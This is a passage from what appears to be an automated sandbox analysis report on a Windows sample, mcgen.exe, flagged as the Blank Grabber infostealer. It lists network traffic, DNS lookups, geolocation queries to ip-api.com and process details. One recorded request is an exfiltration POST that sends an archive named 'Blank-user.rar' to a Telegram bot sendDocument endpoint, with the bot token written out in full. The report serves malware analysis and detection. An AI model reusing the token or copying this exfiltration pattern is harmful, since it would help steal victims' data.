Jan 2, 2025 09:22:39.748209953 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.749852896 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.749936104 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750138998 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750148058 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750224113 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750264883 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750415087 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750457048 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750583887 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750628948 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750745058 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750770092 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750792980 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750802994 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750859022 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750869989 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750885010 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750902891 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.750910044 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.750919104 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751020908 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751038074 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751043081 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751051903 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751075029 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751084089 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751104116 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751111031 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751215935 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751231909 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751245022 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751254082 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751274109 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751280069 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751305103 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751319885 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751332998 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751339912 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751354933 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751362085 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751374960 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751380920 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751413107 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751421928 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.751485109 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751499891 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751524925 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751544952 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751565933 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751579046 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751595020 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751681089 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751693964 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.751719952 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.755613089 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.755776882 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.755800009 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.755855083 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.755877018 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.755898952 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.755918980 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756020069 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756042957 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756062984 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756072998 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756095886 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756120920 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756129026 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756145000 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.756201029 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.765439987 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.765582085 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.765600920 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.765678883 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.765688896 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.765712976 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.765938044 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:41.093986034 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:41.094001055 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:41.094060898 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:41.094089031 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:41.094106913 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:41.094150066 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:41.094628096 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:41.246397018 CET	49888	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:41.251400948 CET	80	49888	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:41.251498938 CET	49888	80	192.168.2.6	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:22:03.979367971 CET	51432	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:22:03.988182068 CET	53	51432	1.1.1.1	192.168.2.6
Jan 2, 2025 09:22:05.314940929 CET	59854	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:22:05.321820974 CET	53	59854	1.1.1.1	192.168.2.6
Jan 2, 2025 09:22:38.390405893 CET	59146	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:22:38.397166967 CET	53	59146	1.1.1.1	192.168.2.6
Jan 2, 2025 09:22:39.101531982 CET	49186	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:22:39.108525991 CET	53	49186	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 09:22:03.979367971 CET	192.168.2.6	1.1.1.1	0x44dd	Standard query (0)	blank-q0y5l.in	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:05.314940929 CET	192.168.2.6	1.1.1.1	0x79dc	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:38.390405893 CET	192.168.2.6	1.1.1.1	0xa383	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:39.101531982 CET	192.168.2.6	1.1.1.1	0xaa1	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:22:03.988182068 CET	1.1.1.1	192.168.2.6	0x44dd	Name error (3)	blank-q0y5l.in	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:05.321820974 CET	1.1.1.1	192.168.2.6	0x79dc	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:38.397166967 CET	1.1.1.1	192.168.2.6	0xa383	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:22:39.108525991 CET	1.1.1.1	192.168.2.6	0xaa1	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49718	208.95.112.1	80	7020	C:\Users\user\Desktop\mcgen.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:22:05.330420017 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 2, 2025 09:22:05.867588997 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 08:22:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49888	208.95.112.1	80	7020	C:\Users\user\Desktop\mcgen.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:22:38.403181076 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 2, 2025 09:22:38.893599033 CET	381	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 08:22:37 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49894	149.154.167.220	443	7020	C:\Users\user\Desktop\mcgen.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 08:22:39 UTC	268	OUT	POST /bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 727365 User-Agent: python-urllib3/2.3.0 Content-Type: multipart/form-data; boundary=15fc0aba29de58fbc6372618a4a7a3b7
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: 2d 2d 31 35 66 63 30 61 62 61 32 39 64 65 35 38 66 62 63 36 33 37 32 36 31 38 61 34 61 37 61 33 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 65 6e 67 69 6e 65 65 72 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 1f a8 d1 f5 21 04 00 00 01 0f 9e 48 a5 72 7a 0f 08 72 64 86 ae 7c fd f2 58 68 16 6a 65 51 27 4d c9 25 e6 1b 8c ce eb b4 b6 0c e4 50 b6 76 da 77 24 b4 07 cf 5e 59 b6 f5 38 c3 89 29 4a ac b8 1a fb 42 8f fd 2e 36 05 b2 49 cc f6 54 85 f0 69 57 3e 4a 86 d2 c4 27 83 76 e3 Data Ascii: --15fc0aba29de58fbc6372618a4a7a3b7Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!Hrzrd\|XhjeQ'M%Pvw$^Y8)JB.6ITiW>J'v
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: 33 d4 94 ba a7 09 3b 3d fc dd f7 76 9d 1f a9 ef e1 b0 19 42 a5 92 f5 95 2c 7f 79 87 e2 d9 25 5d 45 9c 0a 77 4a cb 84 79 90 53 4e be 21 11 a3 e0 8c 55 38 44 bf 56 e8 ce 3b f7 2e 7d d8 89 3f e2 07 4b bb 2a aa e8 a2 15 02 34 61 4c 88 d4 9f 9f 0c 3b 80 b1 7f 20 78 62 18 5b fd a0 c3 84 a8 82 d1 8a cb e3 83 60 6c 57 d9 33 d6 ea 43 af 7c d0 f6 3f e5 8c ab 0a 32 5d 6d f7 41 a5 26 b6 93 6c 59 d5 3c 6c c7 53 9f b2 63 d4 6b 72 8c 6f b5 27 d5 23 42 ed 1f 24 f1 a3 9f 4a 4b 28 c2 2a 12 71 95 ba be a2 d2 cc de 7b ba 3f aa 85 7b 14 77 95 5c 3c 17 7c e6 de e7 08 7c 4c 25 e9 d3 6d b8 c0 af 00 d1 ad 3d ab e2 cb 34 11 5b 76 16 e5 0b 30 bf 7e 47 c6 75 86 f6 9e cd d5 66 f4 f9 34 6b 5e 53 10 8c 13 bb d7 e2 25 98 98 15 ea 2f 41 5b 93 3d 07 21 f0 65 a2 e3 c1 e4 da fc 5a 7f 1f c7 Data Ascii: 3;=vB,y%]EwJySN!U8DV;.}?K4aL; xb[`lW3C\|?2]mA&lY<lSckro'#B$JK(q{?{w\<\|\|L%m=4[v0~Guf4k^S%/A[=!eZ
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: c7 03 0c f8 54 b8 0b 23 94 47 cc 1d 51 f5 28 dc 1f 8a 48 86 a6 e5 97 7a 38 e9 75 fd 8c 14 2f c8 8b 3e 88 89 da dc d9 0c 9a cd a6 95 7e a5 50 68 f5 9b 2b 36 76 ea 07 b2 92 46 d4 96 cb dc 2b e6 a1 ef 28 de 1c b8 24 c8 3d 65 62 a1 f6 c7 22 f4 66 7f 01 71 47 4e be 56 ce 36 ea a4 4c 0e 3c f1 e9 d7 fc 91 ee a2 2b 92 14 de a5 db 88 e5 93 5b 22 c0 64 24 6e d9 8f d5 46 42 38 8a 97 b5 53 c0 33 4d 7c 15 7c b7 0a 7f 77 43 3b 1d 9f 51 cd 7e f0 d8 30 57 a5 7e c6 0c b7 02 07 30 15 74 43 c0 57 ac 6f 2e be 4e b0 2b 62 99 7f b3 0b a8 9d 71 e9 37 a1 4d 98 0f f6 f7 3f 61 62 8d 74 ca 95 3c fb 8e ca de 63 2e eb 58 43 62 6c 69 b3 60 aa 24 09 35 62 24 fc c6 c2 7c f3 23 8f 37 50 4e ef f3 fe 2c 2d f0 35 01 8e 60 b1 50 08 d0 69 0b 9b 12 32 34 83 ea d7 6d 7e 0c d6 72 a5 b2 dc 46 39 Data Ascii: T#GQ(Hz8u/>~Ph+6vF+($=eb"fqGNV6L<+["d$nFB8S3M\|\|wC;Q~0W~0tCWo.N+bq7M?abt<c.XCbli`$5b$\|#7PN,-5`Pi24m~rF9
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: f5 79 66 e3 6a 17 8b 03 62 7e 83 14 89 82 83 2e 30 5f a7 20 83 c2 54 a4 83 ae f3 e0 71 8d 14 97 ef 86 4e ea ae 5e 5b 98 7e cd 1b d0 4b 2c 4c 61 47 e7 e9 a8 d9 21 cc 99 82 8f 55 c6 f9 67 e3 1a 9c 49 e4 56 36 cf ae f4 e0 de 60 3e ff 50 23 1d 90 07 d2 ae f6 65 f1 b5 de b4 0a 74 1f 93 66 ea 50 72 b9 1a 41 38 e7 5c b3 62 18 c3 ec 60 9e 1a 8c 8b 88 17 52 6b 57 aa 20 a5 ee af 43 1c 9d a8 cc b2 05 5f e7 a1 c4 75 79 9f be 6b a4 b0 fd 30 37 a0 55 ac 83 91 22 4e 7b 81 20 70 30 17 c2 7f 83 eb b7 79 bb 20 81 2d 5e b5 9c 3c 26 d1 68 0e 73 f9 bf 3b c5 4a 66 55 40 f4 17 d3 c5 23 fe 51 12 05 e2 f1 68 60 3a 37 9a d4 63 73 3c be 2b ff 41 ef a9 73 d1 45 f1 6b 0c 1c 45 28 28 b7 f7 77 67 37 07 73 3e e2 5e 64 85 3a 15 e5 dc 70 17 68 6a c9 a8 39 fb 93 a3 9b 31 64 20 0b 54 03 4a Data Ascii: yfjb~.0_ TqN^[~K,LaG!UgIV6`>P#etfPrA8\b`RkW C_uyk07U"N{ p0y -^<&hs;JfU@#Qh`:7cs<+AsEkE((wg7s>^d:phj91d TJ
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: 3f d8 71 66 ba 31 a2 cf 42 96 77 1f fe 0d 16 5c 9c 46 6f c3 b9 47 d6 65 be 2e 95 85 0a b4 76 9d da ee bb b7 85 25 e3 96 6d 90 3d 17 02 65 dc 98 dc e4 8a 67 2c 3f db 2d 9c 62 54 34 96 4f bd 47 35 3a 93 2a 9d 58 b8 4a 03 c0 2c 26 c7 ac 68 ae a8 a2 6b 44 1c 6f 01 b3 c2 8a d5 68 0d 23 9a e3 db 90 98 9b b4 5c 04 91 87 f8 c7 6b 20 ec f7 b8 42 c8 df 53 4a 84 ab f6 e1 66 9e 43 5a 07 d1 bf 53 f0 e3 2f 28 67 bd a7 38 5a cb e8 f0 98 30 86 e0 45 4c 6d fe 31 b3 ef 16 c5 70 97 dd af 18 9e 60 bb f7 8a 3b 76 8a bd e0 a2 00 6a 05 d4 d3 ec 5e 29 ea 02 8e bf c3 23 75 c8 57 37 bd 01 aa f1 6a 36 76 e9 9c 7f 3b 3f 55 6c 69 99 9b a2 c6 4b ba 6c 0c 6d 94 66 89 6c d7 c8 00 a4 59 57 a1 91 f7 c8 25 14 3c ec 13 8a 29 5b 8e 2a 2e 56 a2 ac f7 d1 bc e4 c5 a5 02 5f 1a 9c 03 59 59 41 88 Data Ascii: ?qf1Bw\FoGe.v%m=eg,?-bT4OG5:XJ,&hkDoh#\k BSJfCZS/(g8Z0ELm1p`;vj^)#uW7j6v;?UliKlmflYW%<)[.V_YYA
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: d1 06 5a e9 4a a3 d4 e8 cf 76 e7 b8 17 68 2c b5 d1 e7 bf 16 d3 e7 c2 65 ec 51 42 dd 65 de eb 1b 53 6f ee 72 5d ea 13 b8 6a 52 49 46 3f b7 de 56 4a f9 91 ee 54 0d 2c d9 68 e6 97 13 c4 1b 47 23 07 d2 4b f2 4e cc 5f 56 b7 92 4d 2d cb 59 f3 31 69 52 99 44 04 21 cd f8 1b 13 00 93 84 84 f2 81 7f e1 f9 41 75 7d c2 51 32 5f 3e 9b 31 e6 8e ee 3f a1 ce 0a 31 47 82 0f 4e 2a 1c 22 6f bc cb b5 35 7f 3c 09 0d cc df 64 d3 97 2c 42 9b 36 e7 58 01 08 88 cc 88 bb 6e 02 bc 63 ee 24 67 44 4a b9 ec ea fb 2d 43 70 e6 d0 1e 76 e6 bf 34 eb eb 6c 55 b6 25 c8 52 d0 50 ce b2 66 8f de da 35 88 2e 23 89 85 21 92 40 59 cb c9 da f7 73 e3 ba e1 17 27 ac 84 9e ad f7 a8 36 a1 b5 e4 72 1e ae 56 93 e3 86 9b 0b 24 cf 8b 87 92 86 d1 71 a7 7d cc f9 7f 33 16 10 f1 4a 63 ac 0a 6d 4d c7 b9 de ae Data Ascii: ZJvh,eQBeSor]jRIF?VJT,hG#KN_VM-Y1iRD!Au}Q2_>1?1GN*"o5<d,B6Xnc$gDJ-Cpv4lU%RPf5.#!@Ys'6rV$q}3JcmM
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: 78 3b 95 dd 7f fe 4b d9 4d 97 43 70 86 d9 5b 65 88 80 65 6a 77 21 6d 2c e4 27 40 9f 48 07 89 42 de 7a 7a c3 f1 95 5d e0 f6 cb 85 84 db 05 7d 13 51 6c 2d 36 ff b1 61 e2 be 97 d7 d8 6d f2 c5 b8 75 1b 05 a4 d4 88 8a 5a fa f9 39 d8 4c 6c 5f 77 d6 e4 f3 22 a3 8b c9 0f 4b 2e eb af 67 f7 51 c2 63 5f 3a 7d b0 68 33 7c 10 eb b6 eb 49 cb 5d d5 53 20 c9 97 97 64 e0 5a 59 f5 73 92 79 89 60 bc c3 d2 25 e7 df aa 34 6c 7e 1f f7 ef c8 e1 99 0f 74 6d 68 3f 58 a2 48 32 56 08 59 65 8c a0 b9 18 6f 84 21 97 85 67 da cb 69 cc 7e 8d ec d1 3d cf e1 ec cb 76 04 ef d0 43 cc 8b 4d 3e 4c 8d 40 df d2 de 7b 4f d2 54 85 ed ba 66 e0 75 3c 3e 7a f5 9b 25 26 54 e7 6e df 4b 36 c3 9f fe 04 90 82 d1 1b d8 6d 30 44 b6 94 4e e9 61 d6 b6 52 30 62 49 33 7d 32 45 65 79 69 24 72 e2 49 e3 6a 41 ca Data Ascii: x;KMCp[eejw!m,'@HBzz]}Ql-6amuZ9Ll_w"K.gQc_:}h3\|I]S dZYsy`%4l~tmh?XH2VYeo!gi~=vCM>L@{OTfu<>z%&TnK6m0DNaR0bI3}2Eeyi$rIjA
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: 48 bb 32 6c 68 9f f0 87 6b 6b a0 81 54 7a d4 64 1d 01 9f a1 88 6a 63 47 08 02 f7 28 ab f1 8f 8a ee e1 c7 f7 40 26 55 e4 6d 90 18 c7 cc 72 21 7a 19 4a 47 da 94 a8 10 dc 81 f9 ac 64 72 3e 6d 08 6f 65 39 98 29 ec 30 a4 20 94 e6 f0 cd 92 0c b1 28 e3 f1 27 6f 42 fc 47 e0 30 c8 87 84 6a 53 c2 34 e0 8d be 58 e6 ae e9 1d 7a d5 86 26 b9 81 b4 c2 69 6e 1c 8a da 2f 31 e9 31 de 0d 7f 72 56 5d 44 08 41 62 0d 59 c3 c7 01 2d 68 13 2c 23 c8 2f a8 f9 16 ec 17 0c ae c7 25 cf ff 64 45 3b 09 25 0c d2 ec cc bd 01 b8 bc 57 83 64 54 65 c0 fa d9 91 77 2d 99 60 72 4d 34 b4 a0 fb e5 c1 91 56 36 aa 1c 92 76 40 d2 06 7a 0c 9a 18 29 5d d4 6e a1 37 4a 02 90 a7 74 24 5c 32 0b b5 9e ab 38 f6 01 ae 1b 6c 51 11 9d 55 de 49 d0 15 0a 69 1b 8e 80 c6 d4 10 34 be 78 20 07 c1 8e 45 27 e0 46 d9 Data Ascii: H2lhkkTzdjcG(@&Umr!zJGdr>moe9)0 ('oBG0jS4Xz&in/11rV]DAbY-h,#/%dE;%WdTew-`rM4V6v@z)]n7Jt$\28lQUIi4x E'F
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: d7 83 fd 39 38 48 cf 16 7b c2 34 52 1e d4 0b ab 29 32 62 ba fc 38 4f 8b 83 08 5d d3 ed de fb 1d 6b d9 d0 f4 42 cf e0 a1 cc 54 44 9e 63 f1 ce b7 3b 92 3d e7 e8 f6 4d 3c 26 31 86 e1 76 ea 84 73 6d 11 b3 3f 06 ce 19 ee f8 d9 a3 98 fe 04 be 6b b4 47 5d d9 25 48 35 4b a7 99 e2 af 70 df df 80 30 90 5d da 86 85 2d e7 5d 99 d0 b9 73 f9 00 ff d7 62 fd f3 f8 e4 a8 e8 58 89 0e 96 0b 32 96 a1 0b cf 93 71 4b 61 75 69 1a ce 45 39 09 ab 90 82 1f 93 46 5d 18 31 e8 f1 17 0a 0a 4f 23 1f 2e 55 56 ff ad 30 a7 92 59 b2 a9 e3 cb 25 09 44 c1 5e 52 c4 ff fc 4c 54 4d 6e b5 72 e2 63 10 a5 78 40 9b bb 7f 8b 17 20 70 38 15 8e 63 8a a7 ab a5 52 e3 79 30 94 98 07 1d 39 85 16 00 0c 0d 0b 06 24 64 d0 59 c8 7a 3d 75 4f c5 1b f2 4c b6 66 80 8a 9a 4e bb 65 d9 96 7f f6 5e 91 7b 60 11 58 67 Data Ascii: 98H{4R)2b8O]kBTDc;=M<&1vsm?kG]%H5Kp0]-]sbX2qKauiE9F]1O#.UV0Y%D^RLTMnrcx@ p8cRy09$dYz=uOLfNe^{`Xg
2025-01-02 08:22:39 UTC	16384	OUT	Data Raw: c5 7a 1e c8 06 bf 43 96 d4 ea 8e df fb b2 80 52 6e 07 f7 91 60 76 13 5e 3a c3 44 ce 54 01 c4 86 61 7d cc 97 29 96 78 d4 79 97 59 02 3a 7d 58 bc 50 20 52 d4 59 2f 5d f3 8d 9f 50 3a cb f1 eb c0 73 8a 15 ed 6e 29 83 1d 46 04 31 26 0c ef 1d 24 48 49 c5 49 d2 79 18 25 1c 0d 61 7c d7 06 89 fa 9f e0 31 d0 4b 35 df 46 19 e0 ff 72 fa 13 07 dc 4a 28 2e c9 82 b9 ca 65 79 9d e0 f9 a8 fc c5 ca dd fe ba 57 64 f2 8d 8c e4 94 a0 ce 28 30 02 80 44 83 55 f0 54 16 dc 8a 6f 17 24 ee 72 a8 62 5a 49 13 7f 0f 80 43 da 20 0f 69 6c de 82 ca 50 e6 79 68 70 cf 2c 07 8c 08 95 06 9b 71 72 ca 0e e0 56 3c 14 f2 3e b7 35 7b 8c 21 64 11 10 91 f5 d6 14 e9 a0 b9 bb 60 90 0e d8 3c 4b f1 20 dd da 30 53 c8 c3 72 70 cf 83 d8 63 16 d2 a6 ba 3d ad 7e 8a fa a1 c6 46 49 42 fe 63 c4 87 68 33 2f b1 Data Ascii: zCRn`v^:DTa})xyY:}XP RY/]P:sn)F1&$HIIy%a\|1K5FrJ(.eyWd(0DUTo$rbZIC ilPyhp,qrV<>5{!d`<K 0Srpc=~FIBch3/
2025-01-02 08:22:41 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 02 Jan 2025 08:22:41 GMT Content-Type: application/json Content-Length: 1699 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	03:22:00
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\mcgen.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\mcgen.exe"
Imagebase:	0x7ff6b9f10000
File size:	8'042'981 bytes
MD5 hash:	211DA2D6A5B8B04B49D1C837EECEE46C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:22:01
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\mcgen.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\mcgen.exe"
Imagebase:	0x7ff6b9f10000
File size:	8'042'981 bytes
MD5 hash:	211DA2D6A5B8B04B49D1C837EECEE46C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
